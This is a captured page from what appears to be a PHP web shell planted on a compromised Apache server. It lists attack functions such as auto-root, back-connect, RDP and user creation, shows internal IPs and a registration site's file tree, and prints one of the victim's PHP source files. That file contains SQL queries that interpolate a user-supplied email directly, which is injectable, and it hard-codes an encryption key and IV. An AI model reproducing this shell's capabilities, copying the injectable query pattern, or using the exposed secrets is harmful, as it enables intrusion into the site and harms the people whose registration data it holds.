Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipdapplication /
old /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
razorpay-php
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxrwxr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user-ankittill30725.php
5.29
KB
-rw-r--r--
class.user.php
4.84
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
296
B
-rw-r--r--
dashboard.php
5.13
KB
-rw-r--r--
dbconfig.php
1.29
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
5.01
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
index.php
5.84
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.34
KB
-rw-r--r--
personalInformations-oldofcsed...
24.15
KB
-rw-r--r--
personalInformations.php
1
KB
-rw-r--r--
register-ankittill30725.php
16.12
KB
-rw-r--r--
register-nandini.php
14.88
KB
-rw-r--r--
register-originaltill29725.php
16.71
KB
-rw-r--r--
register.php
15.56
KB
-rw-r--r--
registrationVerify.php
2.46
KB
-rw-r--r--
resetpass.php
5.25
KB
-rw-r--r--
test-error.php
430
B
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.6
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : personalInformations-oldofcsedu.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; //session_start(); require_once 'common.php'; $studentID = $row[ 'studentID' ]; $personalInformation_fee = new STUDENT(); $emailID = $row[ 'studentEmail' ]; if ( isset( $_POST[ 'btn-submit' ] ) ) { $studentID = $row[ 'studentID' ]; $studentName = $row[ 'studentName' ]; $emailID = trim( $_POST[ 'emailID' ] ); $countryCode = trim( $_POST[ 'countryCode' ] ); $mobileNumber = trim( $_POST[ 'mobileNumber' ] ); $institutionName = trim( $_POST[ 'institutionName' ] ); $department = trim( $_POST[ 'department' ] ); $yourTitle = trim( $_POST[ 'yourTitle' ] ); $institutionType = trim( $_POST[ 'institutionType' ] ); $firstChoice = trim( $_POST[ 'firstChoice' ] ); $howManyTimes = trim( $_POST[ 'howManyTimes' ] ); $secondChoice = trim( $_POST[ 'secondChoice' ] ); $howManyTimes2 = trim( $_POST[ 'howManyTimes2' ] ); $feecover = trim( $_POST[ 'feecover' ] ); $approverEmail = trim( $_POST[ 'approverEmail' ] ); $approverTitle = trim( $_POST[ 'approverTitle' ] ); $approverOtherTitle = trim( $_POST[ 'approverOtherTitle' ] ); $applicationStatus ="PENDING"; $formStatus ="APPLIED"; if ( !isset( $errMSG ) ) { $stmt = $personalInformation_fee->runQuery( "SELECT * FROM personalinformation WHERE studentID=:studentID1 and emailID='$emailID'" ); $stmt->execute( array( ":studentID1" => $studentID ) ); $rows = $stmt->fetch( PDO::FETCH_ASSOC ); if ( $stmt->rowCount() > 0 ) { $errMSG = "You have already submited."; } else { if ( $personalInformation_fee->personalinformation($studentID, $studentName, $emailID, $countryCode, $mobileNumber, $institutionName, $department, $yourTitle, $institutionType, $firstChoice, $howManyTimes, $secondChoice, $howManyTimes2, $feecover, $approverEmail, $approverTitle, $approverOtherTitle,$applicationStatus,$formStatus ) ) { $successMSG = "Your form has been submitted successfuly.."; } else { $errMSG = "Sorry , Query could not execute..."; } } } } ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> IHERN Registration Form <!--<small>Control panel</small> --> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">User Dashboard</li> </ol> </section> <!-- Main content --> <section class="content"> <?php $stmt1 = $personalInformation_fee->runQuery( "SELECT * FROM personalinformation WHERE studentID=:studentID1 and emailID='$emailID'" ); $stmt1->execute( array( ":studentID1" => $studentID ) ); $row1 = $stmt1->fetch( PDO::FETCH_ASSOC ); //$studentIDs1 = $row1['studentID']; $stmtaf1 = $personalInformation_fee->runQuery( "SELECT * FROM applicationfees WHERE studentID=:studentID1 and emailID='$emailID'" ); $stmtaf1->execute( array( ":studentID1" => $studentID ) ); $rowaf1 = $stmtaf1->fetch( PDO::FETCH_ASSOC ); if ( $row1[ 'formStatus' ] == 'APPLIED' ) { ?> <?php //Encryption $original_string = $row1['studentID']; // Plain text/String $cipher_algo = "AES-128-CTR"; //The cipher method, in our case, AES $iv_length = openssl_cipher_iv_length($cipher_algo); //The length of the initialization vector $option = 0; //Bitwise disjunction of flags $encrypt_iv = '8746376827619797'; //Initialization vector, non-null $encrypt_key = "Delftstack!"; // The encryption key // Use openssl_encrypt() encrypt the given string $encrypted_string = openssl_encrypt($original_string, $cipher_algo, $encrypt_key, $option, $encrypt_iv); ?> <div class="alert alert-success alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><center><i class="icon fa fa-check"></i> Your registration details have been submitted succesfully. Click on the dashboard to view the details and do the fee payment if not done yet. <br/><br/> <?php /* if($row1['firstChoice']=='Intro to Programming (Python)') { ?> <a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLink.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4> <?php } elseif($row1['firstChoice']=='Machine Learning'){?> <a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLink.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4> <?php } elseif($row1['firstChoice']=='Operating Systems'){?> <a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLink.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4> <?php } elseif($row1['firstChoice']=='Computer Organization and Architecture'){?> <a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLink.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4> <?php } elseif($row1['firstChoice']=='Effective Teaching Techniques'){?> <a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLink.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4> <?php } */ if($row1['firstChoice']=='Advanced Programming (12 weeks)') { ?> <!--<a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLinkjan23ap.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4>--> <a href="#">Registration and Payments for this module are closed now. </a> </center></h4> <?php } elseif($row1['firstChoice']=='Introduction to Programming (12 weeks)'){?> <!--<a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLinkjan23ip.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4>--> <a href="#">Registration and Payments for this module are closed now. </a> </center></h4> <?php } elseif($row1['firstChoice']=='Theory of Computation (6 weeks)'){?> <!--<a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLinkjan23tc.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4>--> <a href="#">Registration and Payments for this module are closed now. </a> </center></h4> <?php } elseif($row1['firstChoice']=='Data Structures (1 week)'){?> <!--<a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLinkjan23ds.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4>--> <a href="#">Registration and Payments for this module are closed now. </a> </center></h4> <?php } elseif($row1['firstChoice']=='Networks (4 weeks)'){?> <!--<a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLinkjan23nw.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4>--> <a href="#">Registration and Payments for this module are closed now. </a> </center></h4> <?php } elseif($row1['firstChoice']=='Advanced Graph Algorithms'){?> <!--<a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLinkmay23aga.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4>--> <a href="#">Registration and Payments for this module are closed now. </a> </center></h4> <?php } elseif($row1['firstChoice']=='Compiler Design'){?> <!--<a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLinkmay23cd.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4>--> <a href="#">Registration and Payments for this module are closed now. </a> </center></h4> <?php } elseif($row1['firstChoice']=='Theory and Practice of Modern Distributed Systems--'){?> <!--<a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLinkmay23tpmds.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4>--> <a href="#">Registration and Payments for this module are closed now.</a></center></h4> <?php } elseif($row1['firstChoice']=='Advanced Programming'){?> <!--<a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLinkmay23ap.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $encrypted_string; ?>">Click Here for Fee Payment/Receipt</a> </center></h4>--> <a href="#">Registration and Payments for this module are closed now.</a></center></h4> <?php } ?> </div> <!--<p>Please do the payment from this link. <a href="https://csedu.iiitd.ac.in/ApplicationForm/paymentlinkip.php" target="_blank">Click Here</a></p> --> <?php } /*elseif ($rowaf1['emailID']=='$emailID') { header('Location: dashboard.php?authToken=<?php echo $tokenAuth;?>'); }*/ else { ?> <form id="signupForm" name="signupForm" action="personalInformations.php?authToken=<?php echo $tokenAuth;?>" method="post" onSubmit="if(!confirm('please check the details before submit and click on ok if all is fine.')){return false;} return validateForm()"> <!-- SELECT2 EXAMPLE --> <div class="box box-default"> <div class="box-body"> <?php if ( isset( $errMSG ) ) { ?> <div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-ban"></i> Alert! <?php echo $errMSG; ?></h4> </div> <?php } else if ( isset( $successMSG ) ) { ?> <div class="alert alert-success alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-check"></i> Alert! <?php echo $successMSG; ?></h4> </div> <?php } ?> </div> <!-- /.box-header --> <div class="box-body"> <div class="row form-row"> <!--<center><span style="font-weight:bold; color:#FF0000;">Registrations are closed now. </span> <img alt="Gif Image" src="https://iiitd.ac.in/sites/default/files/docs/about/new1-gif.gif" style="width:25px; border:none; margin:0; display:inline; padding:0" /></center><br/><br/> <center><span style="font-weight:bold; color:#FF0000;">NOTE: The modules on Computer Organization and Architecture and Operating Systems will not be offered in Aug 2022, hence registration for these modules is disabled.</span></center><br/> --> <!--<center><span style="font-weight:bold; color:#FF0000;">NOTE: Registration has been closed.</span></center><br/>--> <!--<center><span style="font-weight:bold; color:#FF0000;">NOTE: Registrations are open now..</span></center><br/>--> <div class="col-md-3 form-pd"> <label><strong>First Choice:</strong> Module you want to enroll in (only one allowed) <span style="color:#FF0000; font-weight:bold;">*</span></label> </div> <div class="col-md-6"> <input type="hidden" name="studentName" id="studentName" class="form-control" value="<?php echo $row['studentName']; ?>" readonly> <input type="hidden" name="emailID" id="emailID" class="form-control" readonly value="<?php echo $row['studentEmail']; ?>"> <input type="hidden" name="countryCode" id="countryCode" class="form-control" value="91" readonly> <input type="hidden" name="countryCode" id="countryCode" class="form-control" value="91" readonly> <input type="hidden" name="mobileNumber" id="mobileNumber" class="form-control" value="<?php echo $row['studentMobile']; ?>" readonly> <input type="hidden" name="institutionName" id="institutionName" class="form-control" value="<?php echo $row['institutionName']; ?>" readonly> <input type="hidden" name="department" id="department" class="form-control" value="<?php echo $row['department']; ?>" readonly> <input type="hidden" name="yourTitle" id="yourTitle" class="form-control" value="<?php echo $row['yourTitle']; ?>" readonly> <input type="hidden" name="institutionType" id="institutionType" class="form-control" value="<?php echo $row['institutionType']; ?>" readonly> <select name="firstChoice" id="firstChoice" class="form-control select2" required> <option value="" checked>--Select--</option> <!--<option value="Advanced Graph Algorithms">Advanced Graph Algorithms</option>--> <!--<option value="Compiler Design">Compiler Design</option>--> <!--<option value="Theory and Practice of Modern Distributed Systems">Theory and Practice of Modern Distributed Systems</option>--> <!--<option value="Advanced Programming">Advanced Programming</option>--> <!--<option value="Intro to Programming (Python)">Intro to Programming (Python)</option> <option value="Cyber Security">Cyber Security</option> <option value="Computer Organization and Architecture">Computer Organization and Architecture</option> <option value="Discrete Maths">Discrete Maths</option> <option value="Operating Systems">Operating Systems</option> --> <!--<option value="Advanced Programming (12 weeks)">Advanced Programming (12 weeks)</option> <option value="Introduction to Programming (12 weeks)">Introduction to Programming (12 weeks)</option>--> <!--<option value="Theory of Computation (6 weeks)">Theory of Computation (6 weeks)</option>--> <!--<option value="Data Structures (1 week)">Data Structures (1 week)</option> --> <!--<option value="Networks (4 weeks)">Networks (4 weeks)</option>--> <!--<option value="Intro to Programming (Python)">Intro to Programming (Python)</option> --> <!--<option value="Computer Organization and Architecture">Computer Organization and Architecture</option> --> <!--<option value="Machine Learning">Machine Learning</option> --> <!--<option value="Operating Systems">Operating Systems</option> --> </select> </div> </div> <!-- first Box --> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>How many times you have taught this module <span style="color:#FF0000; font-weight:bold;">*</span></label> </div> <div class="col-md-6"> <!--<input type="text" name="howManyTimes" id="howManyTimes" class="form-control" placeholder="How many times you have taught this course"> --> <select name="howManyTimes" id="howManyTimes" class="form-control select2" required> <option value="" checked>--Select--</option> <option value="1">1</option> <option value="2">2</option> <option value="3">3</option> <option value="4+">4+</option> </select> </div> </div> <div class="row form-row"> <div class="col-md-3 form-pd"> <label><strong>Second Choice:</strong> Module you want to enroll in (only one allowed) <span style="color:#FF0000; font-weight:bold;">*</span></label> </div> <div class="col-md-6"> <select name="secondChoice" id="secondChoice" class="form-control select2" required> <option value="" checked>--Select--</option> <!--<option value="Advanced Graph Algorithms">Advanced Graph Algorithms</option>--> <!--<option value="Compiler Design">Compiler Design</option>--> <!--<option value="Theory and Practice of Modern Distributed Systems">Theory and Practice of Modern Distributed Systems</option>--> <!--<option value="Advanced Programming">Advanced Programming</option>--> <!--<option value="Cyber Security">Cyber Security</option> <option value="Computer Organization and Architecture">Computer Organization and Architecture</option> <option value="Discrete Maths">Discrete Maths</option> <option value="Operating Systems">Operating Systems</option> --> <!--<option value="Advanced Programming (12 weeks)">Advanced Programming (12 weeks)</option> <option value="Introduction to Programming (12 weeks)">Introduction to Programming (12 weeks)</option>--> <!--<option value="Theory of Computation (6 weeks)">Theory of Computation (6 weeks)</option>--> <!--<option value="Data Structures (1 week)">Data Structures (1 week)</option> --> <!--<option value="Networks (4 weeks)">Networks (4 weeks)</option>--> <!--<option value="Intro to Programming (Python)">Intro to Programming (Python)</option> --> <!--<option value="Computer Organization and Architecture">Computer Organization and Architecture</option> --> <!--<option value="Machine Learning">Machine Learning</option> --> <!--<option value="Operating Systems">Operating Systems</option> --> </select> </div> </div> <!-- first Box --> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>How many times you have taught this module <span style="color:#FF0000; font-weight:bold;">*</span></label> </div> <div class="col-md-6"> <!--<input type="text" name="howManyTimes2" id="howManyTimes2" class="form-control" placeholder="How many times you have taught this course"> --> <select name="howManyTimes2" id="howManyTimes2" class="form-control select2" required> <option value="" checked>--Select--</option> <option value="1">1</option> <option value="2">2</option> <option value="3">3</option> <option value="4+">4+</option> </select> </div> </div> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>Who will cover module fees <span style="color:#FF0000; font-weight:bold;">*</span></label> </div> <div class="col-md-6"> <!--<input type="text" name="howManyTimes2" id="howManyTimes2" class="form-control" placeholder="How many times you have taught this course"> --> <input type="radio" name='feecover' value='Myself' required/> Myself <input type="radio" name='feecover' value='My College/Institute' /> My College/Institute <input type="radio" name='feecover' value='Other (Company etc)' /> Other (Company etc) </div> </div> </div> <div class="box-header with-border"> <h3 class="box-title"><strong>Approver Details</strong></h3> </div> <div class="box-body"> <div class="row"> <div class="col-md-3 "></div> <!-- first Box --> <div class="col-md-6"> <!--<p>Email and title of the approver from your institution. (Please take approval from your Head/Dean/Director and ensure that the approver knows that you are expected to put in about 5 hrs per week on the module.) </p> --> <p> Email and title of the approver from your institution. (Please take approval from your Head/Dean/Director <!--and ensure that the approver knows that you are expected to put in about 5 hrs per week on the module -->. If you are a part-time teacher, you can just enter "none" in the email and select options as "None (as am part-time)" from the title dropdown.)</p> </div> </div> <div class="row"> <div class="col-md-3 form-pd"> <label>Email <span style="color:#FF0000; font-weight:bold;">*</span></label> </div> <div class="col-md-6"> <input type="text" name="approverEmail" id="approverEmail" class="form-control" placeholder="Approver Email" required> </div> <!-- first Box --> </div> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>Title <span style="color:#FF0000; font-weight:bold;">*</span></label> </div> <div class="col-md-6"> <select name="approverTitle" id="approverTitle" class="form-control select2" required> <option value="" checked>--Select--</option> <option value="Head">Head</option> <option value="Dean">Dean</option> <option value="Director/VC">Director/VC</option> <option value="other">Other (pls specify)</option> <option value="None (as am part-time)">None (as am part-time)</option> </select> </div> </div> <!-- first Box --> <!-- first Box --> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>Other Title</label> </div> <div class="col-md-6"> <input type="text" name="approverOtherTitle" id="approverOtherTitle" class="form-control"> <br/><p><input type="checkbox" required /> <em> I commit to put in the necessary effort <!--(appx 5 hrs per week) --> for the CSEDU module. <span style="color:#FF0000; font-weight:bold;">*</span><!--I have read the terms & agreements. --></em></p> </div> </div> <!-- first Box --> <div class="row form-row"> <div class="col-md-3 form-pd"> </div> <div class="col-md-9"> <!--<p align="justify"><strong>» If you are a part-time teacher, you can just enter "none" in the email and select options as "None (as am part-time)" from the title dropdown. </strong></p> --> <p align="justify">» <strong>Enrollment</strong>: There is a limit of 100 seats for each module.</p> <!--<p align="justify">» Enrollment will be done largely on a first-come-first-serve basis for all whose registration is approved. Those who could not be accommodated in this offering, will be given preference in next offerings.</p> --> <p align="justify">» Enrollment will be done largely on a first-come-first-serve basis for all whose registration is approved. Those who could not be accommodated in this offering, will be given preference in next offerings.</p> <p align="justify">» Attempts will be made to assign your first choice, though if its registration is full, you may be offered your second choice.</p> <!--<p align="justify">» <strong>Payment</strong>: You will be sent a link for online payment of fees (Rs 10,000 + GST of 18%) once your registration is approved. Payment has to be made within 2 days of receiving the link.</p> --> <!--<p align="justify">» <strong>Payment</strong>: After submission of this form, You will be redirected to the paymemt page for online payment of fees (Rs 5,000 + GST of 18%). Please do the payment from there at the earliest to complete the process.</p> --> <p align="justify">» <strong>Payment</strong>: After submission of this form, You will be redirected to the paymemt page for online payment of relevant fees for that module. Please do the payment from there at the earliest to complete the process.</p> </div> </div> <!-- first Box --> <!-- first Box --> </div> <!-- /.box-body --> <div class="box-footer"> <button type="submit" class="btn btn-default">Cancel</button> <button type="submit" name="btn-submit" class="btn btn-info">Submit</button> </div> </div> </form> <?php }?> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close